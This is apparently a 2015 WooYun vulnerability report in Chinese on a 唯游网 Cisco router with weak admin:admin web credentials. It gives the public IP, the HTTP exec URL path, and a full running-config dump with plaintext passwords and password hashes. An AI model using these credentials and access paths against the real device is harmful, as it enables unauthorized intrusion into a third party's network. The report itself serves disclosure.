当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163552

漏洞标题:唯游网某Cisco设备弱口令导致可以任意执行命令(获取密码远程telnet设备)

相关厂商:唯游网

漏洞作者: 奶嘴

提交时间:2015-12-22 16:59

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RTRT

详细说明:

http://114.141.132.254/level/15/exec/-
弱口令 admin:admin
开启了,“ip http server
使用show running命令查看到telnet密码等配置信息

1.png


2.png


密码wetrip2015,可远程telnet上去。

3.png

漏洞证明:

Building configuration...
Current configuration : 6313 bytes
!
! Last configuration change at 05:10:53 UTC Fri Dec 4 2015 by admin
!
version 15.4
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
no service dhcp
!
hostname R2901
!
boot-start-marker
boot-end-marker
!
!
logging buffered 51200 warnings
enable secret 5 $1$2pfY$/9z0KYTVv.RALeKi9RtG31
enable password cisco
!
no aaa new-model
!
!
!
!
!
!
!
!
!
!
!
ip dhcp excluded-address 10.10.10.1
ip dhcp excluded-address 192.168.10.1 192.168.10.100
ip dhcp excluded-address 172.16.10.1 172.16.10.100
!
!
!
no ip domain lookup
ip domain name yourdomain.com
ip cef
no ipv6 cef
!
multilink bundle-name authenticated
!
vpdn enable
!
vpdn-template  
!
vpdn-group l2tp
 ! Default L2TP VPDN group
 accept-dialin
  protocol l2tp
  virtual-template 1
 no l2tp tunnel authentication
!
!
cts logging verbose
!
crypto pki trustpoint TP-self-signed-231301035
 enrollment selfsigned
 subject-name cn=IOS-Self-Signed-Certificate-231301035
 revocation-check none
 rsakeypair TP-self-signed-231301035
!
!
crypto pki certificate chain TP-self-signed-231301035
 certificate self-signed 01
  30820229 30820192 A0030201 02020101 300D0609 2A864886 F70D0101 05050030 
  30312E30 2C060355 04031325 494F532D 53656C66 2D536967 6E65642D 43657274 
  69666963 6174652D 32333133 30313033 35301E17 0D313530 33303430 34333031 
  395A170D 32303031 30313030 30303030 5A303031 2E302C06 03550403 1325494F 
  532D5365 6C662D53 69676E65 642D4365 72746966 69636174 652D3233 31333031 
  30333530 819F300D 06092A86 4886F70D 01010105 0003818D 00308189 02818100 
  AD51A771 1A54C56E FE94AFBE 4FF7869F 4A31DF8E D03E6A15 C0433A96 9F9AE87F 
  2F754A6F 285D885A 809F9924 F79F08F5 36A8A482 3C998803 EFA068B3 96E1A406 
  F91B9324 B818EF19 A78E1B33 8C838AF2 5498E701 2512DA94 99BCABC8 574DA145 
  A0D5F0E7 E6720ACA 16B8DD47 430A9FAE 4664537F B55EA8CF 31554B4E 1FAB5B5F 
  02030100 01A35330 51300F06 03551D13 0101FF04 05300301 01FF301F 0603551D 
  23041830 1680148F D7212DCD 6F70EF3E 42C6BA06 D86A6538 8AFFCC30 1D060355 
  1D0E0416 04148FD7 212DCD6F 70EF3E42 C6BA06D8 6A65388A FFCC300D 06092A86 
  4886F70D 01010505 00038181 002351C7 8557C8EF 271A559A B3D80BF6 FDF07FA7 
  6B4C7227 1236A99B 5EAFA7EF 243457D9 EF8B02A0 2738D9DA 1A468A04 317B7054 
  599BB859 54E0FA88 8AEE5300 BC04B037 E333D51A 7DAE101D 7E4453A7 BE4E33D4 
  D7BFC53A 5216021A BA77FE1C 9AEBF4B5 78431A93 135F5CE2 EEA62EE5 6638616D 
  3BD990C6 D7C801C7 C641D5DE 8D
  	quit
license udi pid CISCO2901/K9 sn FGL191021RA
!
!
username cisco privilege 15 password 0 wetrip2015
username admin privilege 15 password 0 admin
username wetrip privilege 15 secret 5 $1$JARG$15cURQMCjm0WJOh37DNEf1
!
redundancy
!
!
!
!
!
! 
!
!
!
!
!
!
!
!
!
interface Embedded-Service-Engine0/0
 no ip address
 shutdown
!
interface GigabitEthernet0/0
 description $ETH-LAN$$ETH-SW-LAUNCH$$INTF-INFO-GE 0/0$
 ip address 114.141.132.254 255.255.255.0
 ip nat outside
 ip virtual-reassembly in
 duplex auto
 speed auto
!
interface GigabitEthernet0/1
 ip address 192.168.10.254 255.255.255.0
 ip nat inside
 ip virtual-reassembly in
 duplex auto
 speed auto
!
interface Virtual-Template1
 ip unnumbered GigabitEthernet0/0
 peer default ip address pool l2tp
 ppp authentication pap chap ms-chap ms-chap-v2
!
ip local pool l2tp 192.168.10.220 192.168.10.250
ip forward-protocol nd
!
ip http server
ip http authentication local
no ip http secure-server
ip http timeout-policy idle 60 life 86400 requests 10000
!
ip nat inside source list 100 interface GigabitEthernet0/0 overload
ip nat inside source static 172.16.10.10 114.141.132.250
ip nat inside source static 192.168.10.11 114.141.132.251
ip nat inside source static 192.168.10.12 114.141.132.252
ip route 0.0.0.0 0.0.0.0 114.141.132.249
ip route 3.3.3.3 255.255.255.255 192.168.10.253
ip route 172.16.0.0 255.255.0.0 192.168.10.253
!
ip access-list extended MYTESTACL
!
!
!
access-list 10 permit 192.168.10.0 0.0.0.255
access-list 10 permit 172.16.0.0 0.0.255.255
access-list 100 permit ip 10.1.100.0 0.0.0.255 any
access-list 100 permit ip 192.168.10.0 0.0.0.255 any
access-list 100 permit ip 172.16.0.0 0.0.255.255 any
!
control-plane
!
!
banner exec ^C
% Password expiration warning.
-----------------------------------------------------------------------
 
Cisco Configuration Professional (Cisco CP) is installed on this device 
and it provides the default username "cisco" for  one-time use. If you have 
already used the username "cisco" to login to the router and your IOS image 
supports the "one-time" user option, then this username has already expired. 
You will not be able to login to the router with this username after you exit 
this session.
 
It is strongly suggested that you create a new username with a privilege level 
of 15 using the following command.
 
username <myuser> privilege 15 secret 0 <mypassword>
 
Replace <myuser> and <mypassword> with the username and password you want to 
use.
 
-----------------------------------------------------------------------
^C
banner login ^C
-----------------------------------------------------------------------
Cisco Configuration Professional (Cisco CP) is installed on this device. 
This feature requires the one-time use of the username "cisco" with the 
password "cisco". These default credentials have a privilege level of 15.
 
YOU MUST USE CISCO CP or the CISCO IOS CLI TO CHANGE THESE  PUBLICLY-KNOWN 
CREDENTIALS
Here are the Cisco IOS commands.
username <myuser>  privilege 15 secret 0 <mypassword>
no username cisco
Replace <myuser> and <mypassword> with the username and password you want 
to use. 
IF YOU DO NOT CHANGE THE PUBLICLY-KNOWN CREDENTIALS, YOU WILL NOT BE ABLE 
TO LOG INTO THE DEVICE AGAIN AFTER YOU HAVE LOGGED OFF.
 
For more information about Cisco CP please follow the instructions in the 
QUICK START GUIDE for your router or go to http://www.cisco.com/go/ciscocp 
-----------------------------------------------------------------------
^C
!
line con 0
line aux 0
line 2
 no activation-character
 no exec
 transport preferred none
 transport output pad telnet rlogin lapb-ta mop udptn v120 ssh
 stopbits 1
line vty 0 4
 privilege level 15
 password wetrip2015
 login
 transport input telnet ssh
line vty 5 15
 access-class 23 in
 privilege level 15
 login local
 transport input telnet ssh
!
scheduler allocate 20000 1000
!
end
--------------------------------------------------------------------------------command completed.
--------------------------------------------------------------------------------

修复方案:

修改密码
关闭TELNET
添加访问

版权声明:转载请注明来源 奶嘴@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)